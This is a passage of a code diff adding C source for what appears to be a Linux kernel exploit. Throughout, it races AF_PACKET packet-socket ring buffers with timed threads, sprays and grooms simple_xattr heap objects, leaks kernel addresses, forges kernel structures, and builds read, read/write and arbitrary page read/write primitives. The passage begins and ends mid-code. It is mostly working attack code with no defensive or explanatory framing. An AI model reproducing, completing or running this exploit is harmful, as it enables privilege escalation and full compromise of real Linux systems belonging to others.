pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + pages_order2_read_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + pages_order2_read_primitive_setup_simple_xattr(primitive); + + pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + 
pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool pages_order2_read_primitive_build_primitive( + struct pages_order2_read_primitive *primitive, + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + /* main_work takes timer_interrupt_amplitude before decrease_tpacket_rcv_thread_sleep_time */ + pages_order2_read_primitive_main_work( + primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + timer_interrupt_amplitude, + decrease_tpacket_rcv_thread_sleep_time + ); + + struct simple_xattr_request *overflowed_request = NULL; + struct simple_xattr_request *simple_xattr_request = NULL; + bool overflow_success = false; + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY && !overflow_success; i++) { + char value[KMALLOC_8K_SIZE] = {}; + + simple_xattr_request = primitive->simple_xattr_requests[i]; + if (!simple_xattr_request || !simple_xattr_request->allocated) + continue; + + ssize_t getxattr_ret = getxattr( + simple_xattr_request->filepath, + simple_xattr_request->name, + value, + KMALLOC_8K_SIZE + ); + + if (getxattr_ret < 0 && errno == ERANGE) { + primitive->overflowed_simple_xattr_request = simple_xattr_request; + primitive->simple_xattr_requests[i] = NULL; + overflow_success = true; + } + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + pages_order2_read_primitive_page_drain_cleanup(primitive); + + if (!overflow_success) { + pages_order2_read_primitive_cleanup_simple_xattr(primitive); + } else { + Close(primitive->drain_pages_order2_packet_socket); + primitive->drain_pages_order2_packet_socket = -1; + Close(primitive->drain_pages_order3_packet_socket_1); + primitive->drain_pages_order3_packet_socket_1 = -1; + Close(primitive->drain_pages_order3_packet_socket_2); + primitive->drain_pages_order3_packet_socket_2 = -1; + } + + return overflow_success; +} + +struct
pages_order2_read_primitive pages_order2_read_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd +) +{ + struct pages_order2_read_primitive pages_order2_read_primitive = {}; + pages_order2_read_primitive_init(&pages_order2_read_primitive); + + struct timespec pages_order2_read_primitive_sleep_decrease_amplitude = { .tv_nsec = 5000 }; + struct timespec pages_order2_read_primitive_timer_interrupt_amplitude = { .tv_nsec = 167000 }; + + bool pages_order2_read_primitive_build_success = false; + while (!pages_order2_read_primitive_build_success) { + pages_order2_read_primitive_build_success = pages_order2_read_primitive_build_primitive( + &pages_order2_read_primitive, + necessary_threads, + configure_network_interface_socket, + timerfd, + pages_order2_read_primitive_sleep_decrease_amplitude, + pages_order2_read_primitive_timer_interrupt_amplitude + ); + + if (pages_order2_read_primitive_build_success) { + fprintf(stderr, "pages_order2_read_primitive_build_success\n"); + if (!pages_order2_read_primitive_build_leaked_simple_xattr(&pages_order2_read_primitive)) { + pages_order2_read_primitive_cleanup(&pages_order2_read_primitive); + pages_order2_read_primitive_init(&pages_order2_read_primitive); + pages_order2_read_primitive_build_success = false; + } + + if (!pages_order2_read_primitive_build_success) { + fprintf(stderr, "pages_order2_read_primitive_build_success became false, retrying\n"); + } + } + } + + return pages_order2_read_primitive; +} + +void *pages_order2_read_primitive_trigger(struct pages_order2_read_primitive *pages_order2_read_primitive) +{ + void *leak_data = Calloc(1, XATTR_SIZE_MAX); + Getxattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name, + leak_data, + XATTR_SIZE_MAX + ); + + return leak_data; +} + +bool pages_order2_read_primitive_build_leaked_simple_xattr(struct pages_order2_read_primitive
*pages_order2_read_primitive) +{ + void *tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + struct simple_xattr *leaked_simple_xattrs = tmp + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + struct simple_xattr *leaked_simple_xattr = NULL; + int leaked_simple_xattr_count = (XATTR_SIZE_MAX - (PAGES_ORDER2_SIZE - sizeof(struct simple_xattr))) / PAGES_ORDER2_SIZE; + int simple_xattr_requests_idx = -1; + int leaked_simple_xattrs_idx = -1; + bool found_leaked_simple_xattr = false; + + for (int i = 0; i < leaked_simple_xattr_count && !found_leaked_simple_xattr; i++) { + leaked_simple_xattr = &leaked_simple_xattrs[i]; + + if (!is_data_look_like_simple_xattr(leaked_simple_xattr, KMALLOC_8K_SIZE)) + continue; + else { + simple_xattr_dump(leaked_simple_xattr); + } + + u8 *leaked_simple_xattr_value = leaked_simple_xattr->value; + + if ( + strncmp( + leaked_simple_xattr_value, + PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN, + strlen(PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_BEGIN) + ) != 0 + ) { + continue; + } + + if (sscanf(leaked_simple_xattr_value, PAGES_ORDER2_GROOM_SIMPLE_XATTR_VALUE_FMT, &simple_xattr_requests_idx) != 1) + continue; + + if (simple_xattr_requests_idx < 0 || simple_xattr_requests_idx >= TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY) + continue; + + pages_order2_read_primitive->leaked_content_simple_xattr_request = pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx]; + pages_order2_read_primitive->simple_xattr_requests[simple_xattr_requests_idx] = NULL; + leaked_simple_xattrs_idx = i; + found_leaked_simple_xattr = true; + } + + if (!found_leaked_simple_xattr) { + free(tmp); + + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + 
pages_order2_read_primitive_cleanup_simple_xattr(pages_order2_read_primitive); + return false; + } + + for (int i = 0; i < TOTAL_PAGES_ORDER2_SIMPLE_XATTR_SPRAY; i++) { + if (pages_order2_read_primitive->simple_xattr_requests[i] && pages_order2_read_primitive->simple_xattr_requests[i]->allocated) { + Removexattr( + pages_order2_read_primitive->simple_xattr_requests[i]->filepath, + pages_order2_read_primitive->simple_xattr_requests[i]->name + ); + + pages_order2_read_primitive->simple_xattr_requests[i]->allocated = false; + } + } + + free(tmp); + tmp = pages_order2_read_primitive_trigger(pages_order2_read_primitive); + leaked_simple_xattrs = tmp + PAGES_ORDER2_SIZE - sizeof(struct simple_xattr); + leaked_simple_xattr = &leaked_simple_xattrs[leaked_simple_xattrs_idx]; + + u64 parent = (u64)(__rb_parent(leaked_simple_xattr->rb_node.__rb_parent_color)); + u64 left = (u64)(leaked_simple_xattr->rb_node.rb_left); + u64 right = (u64)(leaked_simple_xattr->rb_node.rb_right); + + pages_order2_read_primitive->overflowed_simple_xattr_kernel_address = parent ? parent : (left ? 
left : right); + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address = pages_order2_read_primitive->overflowed_simple_xattr_kernel_address + (leaked_simple_xattrs_idx + 1) * PAGES_ORDER2_SIZE; + + printf("[DEBUG] pages_order2_read_primitive->overflowed_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->overflowed_simple_xattr_kernel_address); + printf("[DEBUG] pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address: 0x%016lx\n", pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address); + + free(tmp); + return true; +} + +void simple_xattr_read_write_primitive_init(struct simple_xattr_read_write_primitive *primitive) +{ + primitive->drain_pages_order2_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_1 = Socket(AF_PACKET, SOCK_RAW, 0); + primitive->drain_pages_order3_packet_socket_2 = Socket(AF_PACKET, SOCK_RAW, 0); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) + primitive->spray_pg_vec_packet_sockets[i] = Socket(AF_PACKET, SOCK_RAW, 0); + + primitive->overflowed_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + struct tpacket_req3 tx_ring = {}; + tx_ring.tp_block_size = PAGES_ORDER1_SIZE; + tx_ring.tp_block_nr = 1; + tx_ring.tp_frame_size = PAGES_ORDER1_SIZE; + tx_ring.tp_frame_nr = tx_ring.tp_block_size / tx_ring.tp_frame_size * tx_ring.tp_block_nr; + + struct tpacket_req3 rx_ring = {}; + rx_ring.tp_block_size = PAGES_ORDER3_SIZE; + rx_ring.tp_block_nr = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_KMALLOC_16; + rx_ring.tp_frame_size = PAGES_ORDER3_SIZE; + rx_ring.tp_frame_nr = rx_ring.tp_block_size / rx_ring.tp_frame_size * rx_ring.tp_block_nr; + rx_ring.tp_sizeof_priv = 16248; + rx_ring.tp_retire_blk_tov = USHRT_MAX; + + struct sock_filter filter[MAX_FILTER_LEN] = {}; + for (int i = 0; i < MAX_FILTER_LEN - 1; i++) { + filter[i].code = BPF_LD | BPF_IMM; + filter[i].k = 0xcafebabe; + } + + filter[MAX_FILTER_LEN - 
1].code = BPF_RET | BPF_K; + filter[MAX_FILTER_LEN - 1].k = sizeof(void *); + + primitive->victim_packet_socket_config = victim_packet_socket_config_create( + (struct __kernel_sock_timeval){ .tv_sec = 1 }, // sndtimeo + (struct sockaddr_ll){ .sll_family = AF_PACKET, .sll_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME), .sll_protocol = htons(ETH_P_ALL) }, // addr + tx_ring, // tx_ring + rx_ring, // rx_ring + 1, // packet_loss + TPACKET_V3, // packet_version + 38, // packet_reserve + filter // filter + ); +} + +void simple_xattr_read_write_primitive_page_drain(struct simple_xattr_read_write_primitive *primitive) +{ + alloc_pages(primitive->drain_pages_order2_packet_socket, 256, PAGES_ORDER2_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_1, 128, PAGES_ORDER3_SIZE); + alloc_pages(primitive->drain_pages_order3_packet_socket_2, 128, PAGES_ORDER3_SIZE); +} + +void simple_xattr_read_write_primitive_setup_pg_vec(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order3_packet_socket_1); + + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { + alloc_pages(primitive->spray_pg_vec_packet_sockets[i], MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + primitive->spray_pg_vec_packet_sockets_state[i] = 1; + } + + for (int i = 64, free_count = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets) && free_count < 6; i += 16, free_count++) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } +} + +void simple_xattr_read_write_primitive_page_drain_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + free_pages(primitive->drain_pages_order2_packet_socket); + free_pages(primitive->drain_pages_order3_packet_socket_2); +} + +void simple_xattr_read_write_primitive_pg_vec_cleanup(struct simple_xattr_read_write_primitive *primitive) +{ + for (int i = 0; i < ARRAY_SIZE(primitive->spray_pg_vec_packet_sockets); i++) { 
+ if (primitive->spray_pg_vec_packet_sockets_state[i] && primitive->spray_pg_vec_packet_sockets[i] != -1) { + free_pages(primitive->spray_pg_vec_packet_sockets[i]); + primitive->spray_pg_vec_packet_sockets_state[i] = 0; + } + } +} + +void simple_xattr_read_write_primitive_main_work( + struct simple_xattr_read_write_primitive *primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int configure_network_interface_socket, + struct timespec timer_interrupt_amplitude, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + u64 simple_xattr_kernel_address +) +{ + u8 packet_data[128] = {}; + int dummy_ifindex = If_nametoindex(DUMMY_INTERFACE_NAME); + *(u64 *)(packet_data) = simple_xattr_kernel_address; + + struct pg_vec_lock_thread_work *pg_vec_lock_thread_work = NULL; + struct pg_vec_buffer_thread_work *pg_vec_buffer_thread_work = NULL; + struct tpacket_rcv_thread_work *tpacket_rcv_thread_work = NULL; + struct tpacket_rcv_thread_work_result *tpacket_rcv_thread_work_result = NULL; + struct msghdr *msghdr = NULL; + + struct victim_packet_socket_config *victim_packet_socket_config = primitive->victim_packet_socket_config; + struct timespec pg_vec_lock_timeout = { + .tv_sec = victim_packet_socket_config->sndtimeo.tv_sec, + .tv_nsec = victim_packet_socket_config->sndtimeo.tv_usec * NSEC_PER_USEC + }; + + struct victim_packet_socket *victim_packet_socket = victim_packet_socket_create(victim_packet_socket_config); + pg_vec_lock_thread_work = pg_vec_lock_thread_work_create(victim_packet_socket, dummy_ifindex); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(victim_packet_socket, true, false); + msghdr = msghdr_create(packet_data, sizeof(packet_data), DUMMY_INTERFACE_NAME); + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain(primitive); + victim_packet_socket_configure(victim_packet_socket); + simple_xattr_read_write_primitive_setup_pg_vec(primitive); + 
pg_vec_lock_thread_send_work(necessary_threads->pg_vec_lock_thread, pg_vec_lock_thread_work); + struct timespec pg_vec_lock_acquire_time = pg_vec_lock_thread_wait_in_work(necessary_threads->pg_vec_lock_thread); + network_interface_down(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_in_work(necessary_threads->pg_vec_buffer_thread); + network_interface_up(configure_network_interface_socket, DUMMY_INTERFACE_NAME); + struct timespec pg_vec_lock_release_time = timespec_add(pg_vec_lock_acquire_time, pg_vec_lock_timeout); + + pin_thread_on_cpu(CPU_NUMBER_ONE); + struct itimerspec settime_value = {}; + settime_value.it_value = timespec_add(pg_vec_lock_release_time, timer_interrupt_amplitude); + Timerfd_settime(timerfd, TFD_TIMER_ABSTIME, &settime_value, NULL); + + tpacket_rcv_thread_work = tpacket_rcv_thread_work_create(pg_vec_lock_release_time, decrease_tpacket_rcv_thread_sleep_time, msghdr); + tpacket_rcv_thread_send_work(necessary_threads->tpacket_rcv_thread, tpacket_rcv_thread_work); + tpacket_rcv_thread_wait_work_complete(necessary_threads->tpacket_rcv_thread); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + pg_vec_lock_thread_wait_work_complete(necessary_threads->pg_vec_lock_thread); + pg_vec_buffer_thread_work = pg_vec_buffer_thread_work_create(NULL, false, true); + pg_vec_buffer_thread_send_work(necessary_threads->pg_vec_buffer_thread, pg_vec_buffer_thread_work); + pg_vec_buffer_thread_wait_work_complete(necessary_threads->pg_vec_buffer_thread); + victim_packet_socket_destroy(victim_packet_socket); +} + +bool simple_xattr_read_write_primitive_build_primitive( + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive, + struct necessary_threads *necessary_threads, + int timerfd, + int 
configure_network_interface_socket, + struct timespec decrease_tpacket_rcv_thread_sleep_time, + struct timespec timer_interrupt_amplitude +) +{ + simple_xattr_read_write_primitive_main_work( + simple_xattr_read_write_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + timer_interrupt_amplitude, + decrease_tpacket_rcv_thread_sleep_time, + pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address + ); + + bool overflow_success = false; + for (int i = 0; i < ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets) && !overflow_success; i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] == 0) + continue; + + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + void *mem = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i], + 0 + ); + + struct simple_xattr *simple_xattr = mem + 4 * PAGE_SIZE; + if (is_data_look_like_simple_xattr(simple_xattr, KMALLOC_8K_SIZE)) { + simple_xattr_dump(simple_xattr); + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket = simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets_state[i] = 0; + simple_xattr_read_write_primitive->manipulated_simple_xattr_request = pages_order2_read_primitive->leaked_content_simple_xattr_request; + pages_order2_read_primitive->leaked_content_simple_xattr_request = NULL; + overflow_success = true; + } + + Munmap(mem, mmap_size); + } + + pin_thread_on_cpu(CPU_NUMBER_ZERO); + simple_xattr_read_write_primitive_page_drain_cleanup(simple_xattr_read_write_primitive); + simple_xattr_read_write_primitive_pg_vec_cleanup(simple_xattr_read_write_primitive); + + if (overflow_success) { + for (int i = 0; i < 
ARRAY_SIZE(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets); i++) { + if (simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] != -1) { + Close(simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i]); + simple_xattr_read_write_primitive->spray_pg_vec_packet_sockets[i] = -1; + } + } + } + + return overflow_success; +} + +struct simple_xattr *simple_xattr_read_write_primitive_mmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + simple_xattr_read_write_primitive->mmap_address = Mmap( + NULL, + mmap_size, + PROT_READ | PROT_WRITE, + MAP_SHARED, + simple_xattr_read_write_primitive->overflowed_pg_vec_packet_socket, + 0 + ); + + struct simple_xattr *simple_xattr = simple_xattr_read_write_primitive->mmap_address + 4 * PAGE_SIZE; + return simple_xattr; + +} + +void simple_xattr_read_write_primitive_munmap(struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive) +{ + u64 mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + Munmap(simple_xattr_read_write_primitive->mmap_address, mmap_size); + simple_xattr_read_write_primitive->mmap_address = NULL; +} + +void abr_page_read_write_primitive_build_primitive( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + struct simple_xattr_read_write_primitive *simple_xattr_read_write_primitive, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + pin_thread_on_cpu(CPU_NUMBER_ZERO); + Removexattr( + pages_order2_read_primitive->overflowed_simple_xattr_request->filepath, + pages_order2_read_primitive->overflowed_simple_xattr_request->name + ); + + simple_xattr_request_destroy(pages_order2_read_primitive->overflowed_simple_xattr_request); + pages_order2_read_primitive->overflowed_simple_xattr_request = NULL; + + ssize_t getxattr_ret = 0; + u8 value_set[XATTR_SIZE_MAX] = {}; + u8 value_get[XATTR_SIZE_MAX] = {}; + 
struct simple_xattr *manipulated_simple_xattr = simple_xattr_read_write_primitive_mmap(simple_xattr_read_write_primitive); + u64 original_manipulated_simple_xattr_name_pointer = (u64)(manipulated_simple_xattr->name); + u64 fake_simple_xattr_name_addr = 0; + u64 fake_simple_xattr_addr = 0; + int overwritten_pg_vec_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + bool abr_page_read_write_primitive_build_success = false; + + while (!abr_page_read_write_primitive_build_success) { + bool fake_simple_xattr_name_success = false; + int fake_simple_xattr_name_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_name_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + if (manipulated_simple_xattr->rb_node.rb_right) + fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr->rb_node.rb_right; + else + fake_simple_xattr_name_addr = (u64)manipulated_simple_xattr->rb_node.rb_left; + + fprintf(stderr, "fake_simple_xattr_name_addr: 0x%016lx\n", fake_simple_xattr_name_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR_NAME__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_name_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + strcpy(mem, FAKE_SIMPLE_XATTR_NAME); + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (char *)(fake_simple_xattr_name_addr); + + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + fake_simple_xattr_name_success = true; + } + + 
manipulated_simple_xattr->name = (char *)original_manipulated_simple_xattr_name_pointer; + + if (!fake_simple_xattr_name_success) { + free_pages(fake_simple_xattr_name_packet_socket); + } + } + + fprintf(stderr, "fake_simple_xattr_name_success\n"); + + bool fake_simple_xattr_success = false; + int fake_simple_xattr_packet_socket = Socket(AF_PACKET, SOCK_RAW, 0); + + while (!fake_simple_xattr_success) { + Setxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME, + value_set, + KMALLOC_8K_SIZE, + XATTR_CREATE + ); + + bool is_right_node; + if (manipulated_simple_xattr->rb_node.rb_right) { + fake_simple_xattr_addr = (u64)manipulated_simple_xattr->rb_node.rb_right; + is_right_node = true; + } else { + fake_simple_xattr_addr = (u64)manipulated_simple_xattr->rb_node.rb_left; + is_right_node = false; + } + + fprintf(stderr, "fake_simple_xattr_addr: 0x%016lx\n", fake_simple_xattr_addr); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + LEAK_PAGES_ORDER2_FOR_FAKE_SIMPLE_XATTR__SIMPLE_XATTR_NAME + ); + + alloc_pages(fake_simple_xattr_packet_socket, 1, PAGES_ORDER2_SIZE); + void *mem = Mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + strcpy(mem, DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION); + + manipulated_simple_xattr->name = (void *)fake_simple_xattr_addr; + getxattr_ret = getxattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + DETECT_FAKE_SIMPLE_XATTR_RECLAIMATION, + value_get, + manipulated_simple_xattr->size + ); + + if (getxattr_ret == manipulated_simple_xattr->size) { + memset(mem, 0, 1 * PAGES_ORDER2_SIZE); + struct simple_xattr *fake_simple_xattr = mem; + fake_simple_xattr->rb_node.__rb_parent_color = pages_order2_read_primitive->leaked_content_simple_xattr_kernel_address; + fake_simple_xattr->name = (char 
*)fake_simple_xattr_name_addr; + fake_simple_xattr->size = KMALLOC_8K_SIZE; + + if (is_right_node) { + manipulated_simple_xattr->rb_node.rb_right = (void *)fake_simple_xattr_addr; + } else { + manipulated_simple_xattr->rb_node.rb_left = (void *)fake_simple_xattr_addr; + } + + fake_simple_xattr_success = true; + } else { + free_pages(fake_simple_xattr_packet_socket); + } + + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + manipulated_simple_xattr->name = (void *)original_manipulated_simple_xattr_name_pointer; + } + + fprintf(stderr, "fake_simple_xattr_success\n"); + + Removexattr( + simple_xattr_read_write_primitive->manipulated_simple_xattr_request->filepath, + FAKE_SIMPLE_XATTR_NAME + ); + + alloc_pages(overwritten_pg_vec_packet_socket, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2, PAGE_SIZE); + void *mem = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_name_packet_socket, 0); + void *mem1 = mmap(NULL, 1 * PAGES_ORDER2_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fake_simple_xattr_packet_socket, 0); + struct pgv *pgv = NULL; + + if (mem != MAP_FAILED && is_data_look_like_pgv(mem, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_name_packet_socket; + pgv = mem; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } else if (mem1 != MAP_FAILED && is_data_look_like_pgv(mem1, MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2)) { + abr_page_read_write_primitive->packet_socket_to_overwrite_pg_vec = fake_simple_xattr_packet_socket; + pgv = mem1; + abr_page_read_write_primitive->original_buffer_page_addr = (u64)(pgv[0].buffer); + abr_page_read_write_primitive_build_success = true; + } + + if (mem != MAP_FAILED) + Munmap(mem, 1 * PAGES_ORDER2_SIZE); + + if (mem1 != MAP_FAILED) + Munmap(mem1, 1 * PAGES_ORDER2_SIZE); + + if (abr_page_read_write_primitive_build_success) { + 
abr_page_read_write_primitive->packet_socket_with_overwritten_pg_vec = overwritten_pg_vec_packet_socket; + abr_page_read_write_primitive->overwrite_pg_vec_mmap_size = 1 * PAGES_ORDER2_SIZE; + abr_page_read_write_primitive->overwritten_pg_vec_mmap_size = MIN_PAGE_COUNT_TO_ALLOCATE_PGV_ON_PAGES_ORDER2 * PAGE_SIZE; + } else { + free_pages(overwritten_pg_vec_packet_socket); + } + } + + simple_xattr_read_write_primitive_munmap(simple_xattr_read_write_primitive); +} + +struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive_build( + struct necessary_threads *necessary_threads, + int configure_network_interface_socket, + int timerfd, + struct pages_order2_read_primitive *pages_order2_read_primitive +) +{ + struct simple_xattr_read_write_primitive simple_xattr_read_write_primitive = {}; + simple_xattr_read_write_primitive_init(&simple_xattr_read_write_primitive); + + struct timespec simple_xattr_read_write_primitive_sleep_decrease_amplitude = { .tv_nsec = 5000 }; + struct timespec simple_xattr_read_write_primitive_timer_interrupt_amplitude = { .tv_nsec = 167000 }; + + bool simple_xattr_read_write_primitive_build_success = false; + while (!simple_xattr_read_write_primitive_build_success) { + simple_xattr_read_write_primitive_build_success = simple_xattr_read_write_primitive_build_primitive( + &simple_xattr_read_write_primitive, + pages_order2_read_primitive, + necessary_threads, + timerfd, + configure_network_interface_socket, + simple_xattr_read_write_primitive_sleep_decrease_amplitude, + simple_xattr_read_write_primitive_timer_interrupt_amplitude + ); + } + + return simple_xattr_read_write_primitive; +} + +void *abr_page_read_write_primitive_mmap( + struct abr_page_read_write_primitive *abr_page_read_write_primitive, + u64 page_aligned_addr_to_mmap +) +{ + if (page_aligned_addr_to_mmap & (PAGE_SIZE - 1)) { + fprintf(stderr, "[abr_page_read_write_primitive_mmap]: page_aligned_addr_to_mmap is not page aligned\n"); + return NULL; + } + + void *mem = Mmap( 
